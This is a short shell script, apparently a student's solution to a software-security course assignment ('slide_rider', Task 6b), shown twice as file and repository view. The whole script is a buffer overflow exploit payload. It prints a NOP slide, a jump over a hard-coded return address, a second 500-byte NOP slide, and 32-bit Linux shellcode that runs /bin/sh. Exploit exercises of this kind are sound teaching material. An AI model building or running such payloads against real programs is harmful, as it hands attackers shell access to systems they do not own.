Systemsicherheit/Assignment 6 - Software Security - Teil 2/slide_rider/solution.sh

#!/usr/bin/env sh

# slide for buffer size 20 + 2 bytes of saved ebp
SLIDE_1=$(printf "\\\\x90%.0s" $(seq 1 22))
# jump over the ret addr
JMP_OVER_RET="\xeb\x04"
RET_ADDR="\x08\xdc\xff\xff"
# main nop slide (500 Bytes)
SLIDE_2=$(printf "\\\\x90%.0s" $(seq 1 500))
SHELLCODE="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80"

printf $SLIDE_1$JMP_OVER_RET$RET_ADDR$SLIDE_2$SHELLCODE
[Assignment-6] Task 6b solution.sh 2024-06-23 18:05:53 +02:00			`#!/usr/bin/env sh`

			`# slide for buffer size 20 + 2 bytes of saved ebp`
			`SLIDE_1=$(printf "\\\\x90%.0s" $(seq 1 22))`
			`# jump over the ret addr`
			`JMP_OVER_RET="\xeb\x04"`
			`RET_ADDR="\x08\xdc\xff\xff"`
			`# main nop slide (500 Bytes)`
			`SLIDE_2=$(printf "\\\\x90%.0s" $(seq 1 500))`
			`SHELLCODE="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80"`

			`printf $SLIDE_1$JMP_OVER_RET$RET_ADDR$SLIDE_2$SHELLCODE`